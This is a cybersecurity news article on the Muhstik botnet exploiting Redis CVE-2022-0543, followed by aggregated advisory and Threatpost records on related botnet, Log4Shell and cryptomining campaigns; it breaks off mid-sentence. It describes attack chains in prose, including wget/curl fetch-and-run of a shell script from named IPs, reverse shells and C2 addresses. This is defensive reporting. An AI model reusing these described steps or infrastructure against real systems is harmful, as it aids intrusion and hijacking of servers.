[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)
Muhstik, a botnet infamous for propagating via web application exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.
The vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.
"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host," Ubuntu noted in an advisory released last month.
According to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script ("russia.sh") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.
First [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.
Capable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years –
* [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) – An input validation vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware
* [**CVE-2018-7600**](<https://nvd.nist.gov/vuln/detail/CVE-2018-7600>) (CVSS score: 9.8) – Drupal remote code execution vulnerability
* [**CVE-2019-2725**](<https://nvd.nist.gov/vuln/detail/CVE-2019-2725>) (CVSS score: 9.8) – Oracle WebLogic Server remote code execution vulnerability
* [**CVE-2021-26084**](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) (CVSS score: 9.8) – An OGNL (Object-Graph Navigation Language) injection flaw in Atlassian Confluence, and
* [**CVE-2021-44228**](<https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html>) (CVSS score: 10.0) – Apache Log4j remote code execution vulnerability (aka Log4Shell)
"This bot connects to an IRC server to receive commands which include the following: download files, shell commands, flood attacks, [and] SSH brute force," Juniper Threat Labs researchers said in a report published last week.
In light of active exploitation of the critical security flaw, users are highly recommended to move quickly to patch their Redis services to the latest version.
Found this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter __](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.
{"hivepro": [{"lastseen": "2022-03-29T16:43:01", "description": "THREAT LEVEL: Red. For a detailed advisory, download the pdf file here Muhstik malware has begun attacking Redis Servers by exploiting a recently reported vulnerability, CVE-2022-0543. This flaw can be found in several Redis Debian packages. The attack began on March 11, 2022, and was carried out by a threat actor who targeted Confluence servers in September 2021 and Log4j in December. The payload is a Muhstik bot variation that may be used to perform DDOS assaults. The threat actor first executes the Lua scripts to exploit the vulnerability found in Redis Debian servers. The threat actor attempts to download "Russia.sh" from "106[.]246.224.219" using wget or curl. It stores it as "/tmp/russ" and runs it which will download and run Linux payload from 160[.]16.58.163. These binaries have been recognized as Muhstik bot variants. This botnet then connects to an IRC server to receive commands that download files, run shell commands, and carry out attacks like flood attacks and SSH brute force attacks. The Mitre TTPs commonly used by Muhstik malware are: TA0001: Initial Access TA0011: Command and Control TA0042: Resource Development TA0008: Lateral Movement T1071: Application Layer Protocol T1588.006: Obtain Capabilities: Vulnerabilities T1190: Exploit Public-Facing Application T1021.004: Remote Services: SSH T1059.004: Command and Scripting Interpreter: Unix Shell Vulnerability Details Indicators of Compromise (IoCs) Patch Links http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html https://security-tracker.debian.org/tracker/CVE-2022-0543 http://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html https://github.com/g0rx/CVE-2018-7600-Drupal-RCE https://jira.atlassian.com/browse/CONFSERVER-67940 https://logging.apache.org/log4j/2.x/manual/migration.html References https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T12:17:03", "type": "hivepro", "title": "Muhstik botnet adds another vulnerability exploit to its arsenal", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600", "CVE-2019-2725", "CVE-2022-0543"], "modified": "2022-03-29T12:17:03", "id": "HIVEPRO:C72A6CAC86F253C92A64FF6B8FCDA675", "href": "https://www.hivepro.com/muhstik-malware-botnet-adds-another-vulnerability-exploit-to-its-arsenal/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-04-11T11:47:52", "description": "Malicious activity exploiting the recently disclosed Oracle WebLogic critical deserialization vulnerability (CVE-2019-2725) is surging. Even though there\u2019s a patch, tens of thousands of vulnerable machines represent an irresistible target for hackers, according to Unit 42 researchers at Palo Alto Networks \u2013 especially since the bug is \u201ctrivial\u201d to exploit.\n\nOracle WebLogic Server is a popular application server used in building and deploying enterprise Java EE applications. Oracle released an out-of-band patch on April 26, 2019 \u2013 though exploitation for what was then a zero-day had already begun, researchers said. Quickly thereafter, attacks distributing a never-before-seen [ransomware variant called \u201cSodinokibi\u201d emerged](<https://threatpost.com/new-sodinokibi-ransomware-exploits-critical-oracle-weblogic-flaw/144233/>); and then attacks [spreading a new variant](<https://threatpost.com/muhstik-botnet-variant-targets-just-patched-oracle-weblogic-flaw/144253/>) of the Muhstik botnet, which is used to launch distributed-denial-of-service (DDoS) and cryptojacking attacks.\n\nNow, other attacks are starting to snowball, with no sign of abating.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cOnce the vulnerability was made public with the release of the patch, numerous instances of proof-of-concept (PoC) code exploiting the vulnerability were released,\u201d Unit 42 researchers said, in a posting [late last week](<https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/>). \u201cPreliminary indicators reveal over 600 exploitation attempts targeting CVE-2019-2725 on Palo Alto Networks soak sites and we expect this number to increase rapidly.\u201d\n\nThey added that a scan showed more than 41,000 publicly accessible WebLogic instances in the wild.\n\n\u201cWith this many publicly available WebLogic instances on the internet, as well as an unknown number of private instances in enterprise environments, we expect an escalation of exploitation attempts in the coming days and weeks,\u201d according to the researchers.\n\nThe critical flaw, which has a CVSS score of 9.8, is a remote code execution bug that is remotely exploitable without authentication. Impacted are versions 10.3.6.0.0 and 12.1.3.0.0 of the product. Palo Alto pointed out that exploitation does not require any interaction from the user \u2013 a remote, unauthenticated user can send an HTTP request containing a crafted SOAP payload and obtain remote code execution trivially.\n\n\u201cPeople are on the lookout for critical vulnerabilities and seek to jump on them quickly so they can exploit them before patches are applied,\u201d Ryan Olson, vice president of threat intelligence for Unit 42 told Threatpost. \u201cAs we outline in the blog, this isn\u2019t a difficult vulnerability to exploit, particularly given it\u2019s similarity to a previous vulnerability from 2017.\u201d\n\nThat previous vulnerability (CVE-2017-10271) allows a remote, unauthenticated attacker to pass Java-class objects with arbitrary contents, allowing for remote code-execution and in many ways provides a blueprint for the new flaw, according to the researchers.\n\n\u201cThis reinforces the importance of good testing for variant vulnerabilities by vendors when patching vulnerabilities,\u201d Olson told Threatpost.\n\n## XMRig and GandCrab\n\nUnit 42 researchers have observed a wide variety of payloads in addition to Muhstik and Sodinokibi, such as a PowerShell loader that fetches the open-source Monero cryptominer known as XMRig. In addition to dropping the miner, it terminates any legitimate Oracle update services that would patch the underlying WebLogic vulnerability, and establishes persistence by copying itself and creating a scheduled task that masquerades as the Oracle update service.\n\nOther attacks are pushing ransomware to infected victims, including [the infamous GandCrab](<https://threatpost.com/gandcrab-decryptor-ransomware/141973/>).\n\n\u201cAt this point, it appears that both ransomware and cryptomining have settled into a stable pattern in terms of use by cybercriminals,\u201d Olson told Threatpost.\n\nThe popularity of WebLogic Server, combined with its tendency to be deployed in business-critical environments, creates an attractive target set for cybercriminals; and exacerbating matters is the fact that there could be \u201can unknown number of private instances in enterprise environments,\u201d Unit 42 researchers said. There are not directly exposed to the web, but an attacker that\u2019s able to penetrate a corporate network could easily uncover them.\n\n\u201cThese would essentially be internal network deployments,\u201d Olson said. \u201cThe attacks wouldn\u2019t be different, but the attackers would have to find a means to launch the attack so that it gets into the internal network.\u201d\n\nBusinesses should make every effort to patch, and patch quickly, Olson noted.\n\n\u201cThis is a reminder that the window for exploitation has narrowed and that enterprises need to be able to deploy critical patches like this in a matter of hours and days, not weeks and months,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2019-05-06T20:04:55", "type": "threatpost", "title": "Oracle WebLogic Exploit-fest Continues with GandCrab Ransomware, XMRig", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2019-2725"], "modified": "2019-05-06T20:04:55", "id": "THREATPOST:760547BA8017A91CB7219FE7629E28B3", "href": "https://threatpost.com/oracle-weblogic-exploit-gandcrab-xmrig/144419/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-03-29T20:34:59", "description": "What researchers are calling a \u201chorde\u201d of miner bots and backdoors are using the [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>) bug to take over vulnerable VMware Horizon servers, with threat actors still actively waging some attacks.\n\nOn Tuesday, Sophos [reported](<https://news.sophos.com/en-us/2022/03/29/horde-of-miner-bots-and-backdoors-leveraged-log4j-to-attack-vmware-horizon-servers/>) that the remote code execution (RCE) Log4j vulnerability in the ubiquitous Java logging library is under active attack, \u201cparticularly among cryptocurrency mining bots.\u201d Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are [initial access brokers](<https://threatpost.com/zebra2104-initial-access-broker-malware-apts/176075/>) (IABs) that could lay the groundwork for later ransomware infections.\n\n## History of Log4Shell Nightmare-ware\n\nThe Log4j flaw was discovered in December, vigorously attacked within hours of its discovery and subsequently dubbed Log4Shell. Sophos\u2019s findings about VMware Horizon servers being besieged by threat actors leveraging the bug is in keeping with what\u2019s been happening since then: In fact, cyberattacks [increased](<https://threatpost.com/cyber-spike-attacks-high-log4j/177481/>) 50 percent YoY in 2021, peaking in December, due to a frenzy of Log4j exploits.\n\nWith [millions](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) of Log4j-targeted attacks clocking in per hour since the flaw\u2019s [discovery](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>), within just a few weeks, there was a record-breaking peak of 925 cyberattacks per week per organization, globally, as Check Point Research (CPR) [reported](<https://blog.checkpoint.com/2022/01/10/check-point-research-cyber-attacks-increased-50-year-over-year/>) in early January.\n\nLog4Shell has been a nightmare for organizations to hunt down and remediate, given that the flaw affected hundreds of software products, \u201cmaking it difficult for some organizations to assess their exposure,\u201d noted Sophos researchers Gabor Szappanos and Sean Gallagher in Tuesday\u2019s report. In other words, some outfits don\u2019t necessarily know if they\u2019re vulnerable.\n\n## Why Attackers Have Zeroed in on Horizon\n\nIn particular, those attacks have included ones targeting vulnerable [VMware Horizon](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>) servers: a platform that serves up virtual desktops and apps across the hybrid cloud. These servers have been important tools in organizations\u2019 arsenals over the past few years, given that the pandemic triggered the necessity to provide work-from-home tools, the researchers pointed out.\n\nAlthough VMware [released](<https://kb.vmware.com/s/article/87073>) patched versions of Horizon earlier this month \u2013 on March 8 \u2013 many organizations may not have been able to deploy the patched version or apply workarounds, if they even know that they\u2019re vulnerable to begin with.\n\n\u201cAttempts to compromise Horizon servers are among the more targeted exploits of Log4Shell vulnerabilities because of their nature,\u201d Sophos said.\n\nEven those organizations that have applied the patches or workarounds may have been already compromised in other ways, given the backdoors and reverse-shell activity Sophos has tracked, the researchers cautioned.\n\nIn late December and January, VMWare\u2019s Horizon servers with Log4Shell vulnerabilities came under [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) attack, as [flagged](<https://www.huntress.com/blog/cybersecurity-advisory-vmware-horizon-servers-actively-being-hit-with-cobalt-strike>) by researchers at Huntress. Other [ attacks](<https://twitter.com/GossiTheDog/status/1484145056198053891>) included those that [installed web shells](<https://digital.nhs.uk/cyber-alerts/2022/cc-4002>).\n\nThose attacks used the Lightweight Directory Access Protocol (LDAP) resource call of Log4j to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution. Sophos has seen these attacks show up in customer telemetry since the beginning of January, the researchers said.\n\nThe attacks against Horizon servers grew throughout January. Beyond attempts to deploy cryptocurrency-mining malware, other attacks were potentially designed either to grant threat actors initial access or to infect targets with ransomware, Sophos said. Such attacks have continued into this month: the security firm shared a bar chart, shown below, that shows the ebb and flow of the attacks that have bled into mid-March.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29124520/attack-horizon-e1648572335942.jpg>)\n\nVMware Horizon server attacks since the beginning of January. Source: Sophos.\n\n\u201cThe largest wave of Log4J attacks aimed at Horizon that we have detected began January 19, and is still ongoing,\u201d the researchers said.\n\nBut this wave hasn\u2019t relied on the use of one of cybercrooks\u2019 favorite tools, Cobalt Strike: a commercial penetration-testing tool that can be used to deploy beacons on systems in order to simulate attacks and test network defenses.\n\nRather, \u201cthe cryptominer installer script is directly executed from the Apache Tomcat component of the Horizon server,\u201d Sophos said, with the most frequently used server in the campaigns being 80.71.158.96.\n\n## The Payloads\n\nSophos found a slew of miners being dumped on targeted Horizon servers, including z0Miner, the JavaX miner and at least two variants \u2013 the Jin and Mimu cryptocurrency miner bots \u2013 of the XMRig commercial cryptominer,. Speaking of which, Uptycs reported in January that cryptojackers had figured out how to [inject XMRig](<https://threatpost.com/cybercriminals-vmware-vsphere-cryptominers/177722/>) into VMware\u2019s vSphere services, undetected. For its part, back in September 2021, Trend Micro [found](<https://www.trendmicro.com/en_us/research/21/i/cryptominer-z0miner-uses-newly-discovered-vulnerability-cve-2021.html>) that z0Miner operators were exploiting the [Atlassian Confluence RCE](<https://threatpost.com/jenkins-atlassian-confluence-cyberattacks/169249/>) (CVE-2021-26084) for cryptojacking attacks.\n\nSophos also found several backdoors, including several legitimate testing tools. One such was implants of Sliver: a tool used by red teams and penetration testers to emulate adversarial tactics. Sliver showed up as a precursor to the Jin miner in all the cases where Sophos was able to investigate further, leading the researchers to suspect that it\u2019s actually the payload. Either that, or maybe the actor behind Sliver might be a ransomware gang, the researchers hypothesized, given that the same servers deploying Sliver also hosted files to deliver the Atera agent as a payload.\n\nAtera is another common, legitimate remote monitoring and management tool. However, the threat actors aren\u2019t attacking existing Atera installations, per se, the researchers said. Rather, \u201cthey install their own Atera agents in order to use the Atera cloud management infrastructure to deploy additional payloads in the future,\u201d they explained.\n\nSophos also found the legitimate Splashtop Streamer remote-access tool being downloaded and installed on infected systems, \u201cprobably as an automated task for the new clients.\u201d\n\nAs well, there were several PowerShell-based reverse shells in the payload mix that had been dropped by the Log4Shell exploits.\n\n## Two Types of Reverse Shells\n\nSophos found two types of reverse shell: one, a shorter script that opens a socket connection to a remote server and executes the received buffer, which is supposed to be a PowerShell command.\n\nThey also found a larger variant of a reverse shell: one that can reflectively load a Windows binary, with the loader as an encrypted and base64 encoded blob, as depicted below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/29155214/Base64_encoded_blob-e1648583546965.jpg>)\n\nBase64 encoded blob. Source: Sophos.\n\nSophos telemetry showed that while z0Miner, JavaX and some other payloads were downloaded directly by the web shells that had been used for initial compromise, the Jin bots were tied to use of Sliver and used the same wallets as Mimo, \u201csuggesting these three malware were used by the same actor,\u201d Sophos said. Researchers believe that Jin is, in fact, \u201csimply a rebranded version of Mimo.\u201d\n\n## Loads of New Malware Loaders\n\nNew malware loaders are springing up like dandelions in the spring. Besides the ones covered by Sophos in Tuesday\u2019s report, security researchers at Symantec today also published a technical[ report](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUeZY5vOK6hHL-2FZQIhe5-2B4JVOehUh4Rb8p3ey37Q9OVEIiWGDSjejxPvkb8ovY0h-2FaWB9dvcXCl3SBCFSEuV5tcRGFsPYlsbDvD-2BUBbuZrpjG-2F3o76yv-2FjW7fnR-2BbuAqcTKlC8Ql3vteVWIz1-2F4jQ39BlDgn8Ze7x-2FjjxdfusIUCoWeHw_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksSSNzbmCCaVViVDpzZ8413vH2SK7hoc-2F9PgDFHE5nPDuAWqJnV7-2B1m3omM9hPkKC6f0TGhlnK7L2Rm0UV3m4RfnEylMOpa8zOk3ZpTlH4NHB441qOzaGmeusjrgk12h1-2FHBCuMABwcfwmdXp6d8OUxE-3D>) on a new malware loader tracked as Verblecon that\u2019s escaped detection due to the polymorphic nature of its code.\n\nVerblecon has likewise been seen in attacks that install cryptocurrency miners on compromised machines.\n\nSaryu Nayyar, CEO and founder of[ Gurucul](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUemyDumHlbVHpjKINAYc3Jk-3DThvL_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzQ9CpkZyf7pccI4YxuRF0BJuYEbml5ScFK0-2F-2FZqd-2FdTf4msXI8najxJ51o4YJVhtdqJKuSTmaXDsB1uynL70vmZixJBnwPhKCug0sz-2BmD22NzQdTPN5KP9W-2FB8FFI76ksRzfCH77Y1C4pRGOycTIJafHsN-2B4KnSygPf4489ZnosIN0CloPhQCESwF4k9NfwdKmZsgKHx6JGWXjEVL3UpRuh84NABjevUYJLlxFeyFD2KR14VLhnCySOfOl1QNCbp-2F2Vu3lWjuUOLb0td2Dh5r3I-3D>), told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it\u2019s also \u201ccritical\u201d to employ sophisticated technologies \u2013 namely, self-training machine learning and behavioral models \u2013 to sniff out exploitation of exposed vulnerabilities as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.\n\n\u201cCurrent [extended detection and response, or XDR] and traditional [security information and event management, or SIEM] solutions, even with claims of User Entity Behavior Analytics rooted in known patterns and rule-based artificial intelligence, are unable to adapt to these methods,\u201d she told Threatpost via email. \u201cOrganizations need to invest in solutions that employ transparent non rule-based machine learning models to more rapidly identify new attacks.\u201d\n\nChris Olson, CEO of digital safety platform The Media Trust, told Threatpost on Tuesday that polymorphic techniques \u201care just another way to hide malicious intentions, along with checks for security tools and live environments.\u201d\n\nThis attack provides another example of how the risks of Web 2.0 are being replicated in Web 3.0, he said via email.\n\n\u201cToday\u2019s embryonic beginnings of Web 3.0 are eerily reminiscent of the Web as it existed in the 1990s, showing sporadic signs of vulnerability that may well foreshadow a future era of cyber chaos,\u201d Olson said.\n\nTo prevent that from happening, we must learn from our past mistakes, he warned. \u201cToday\u2019s digital ecosystem is riddled with threats because Web 2.0 was not designed for cybersecurity from the outset. Untrusted third parties were allowed to proliferate, leading to phishing attacks, malicious advertising, rampant data privacy abuse and other threats that are hard to fix in the present. With Web 3.0, we have a chance to account for potential attack vectors by design \u2013 otherwise, the same issues will replicate themselves with greater potency than ever.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-29T20:33:08", "type": "threatpost", "title": "Log4JShell Used to Swarm VMware Servers with Miners, Backdoors", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2022-03-29T20:33:08", "id": "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "href": "https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-13T21:58:43", "description": "The Panda threat group, best known for launching the widespread and successful 2018 [\u201cMassMiner\u201d cryptomining malware](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>) campaign, has continued to use malware to mine cryptocurrency in more recent attacks. A fresh analysis of the group reveals Panda has adopted a newly-updated infrastructure, payloads and targeting.\n\nWhile considered unsophisticated, researchers warn that the threat group has a wide reach and has attacked organizations in banking, healthcare, transportation and IT services. So far, researchers estimate that Panda has made away with more than $100,000 in Monero \u2013 and with attacks as recently as August 2019, the threat group isn\u2019t ceasing its activities anytime soon, they said.\n\n\u201cPanda\u2019s willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information,\u201d said Christopher Evans and David Liebenberg with [Cisco\u2019s Talos research team.](<https://blog.talosintelligence.com/2019/09/panda-evolution.html>)\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nResearchers first became aware of Panda in the summer of 2018 after they engaged in a widespread illicit mining campaign called \u201c[MassMiner](<https://threatpost.com/massminer-takes-a-kitchen-sink-approach-to-cryptomining/131687/>).\u201d During that campaign, the threat actor used MassScan, a legitimate port scanner, to sniff out various vulnerabilities in servers to exploit, including a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://nvd.nist.gov/vuln/detail/CVE-2017-5638>)).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/09/17155626/image4.png>)\n\nThe threat group then would exploit the flaws and install malware, which would set about mining for Monero and hooking up with a crypto-wallet and mining pool.\n\nSince then, in 2019, researchers said that the threat group has constantly evolved to update its infrastructure, exploits and payloads.\n\n\u201cShortly thereafter [the 2018 campaign], we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers,\u201d researchers said. \u201cWe believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems.\u201d\n\nPanda has constantly changed the vulnerabilities that it targets over the past 